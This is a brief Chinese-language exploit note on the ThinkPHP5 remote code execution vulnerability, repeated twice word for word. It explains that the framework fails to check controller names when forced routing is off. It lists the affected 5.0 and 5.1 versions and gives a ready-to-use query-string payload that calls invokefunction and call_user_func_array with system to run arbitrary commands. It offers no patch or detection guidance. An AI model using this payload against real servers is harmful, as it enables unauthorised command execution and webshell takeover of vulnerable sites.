漏洞详情
由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。
影响版本
ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31
漏洞利用
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令行命令]
漏洞详情
由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。
影响版本
ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31
漏洞利用
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令行命令]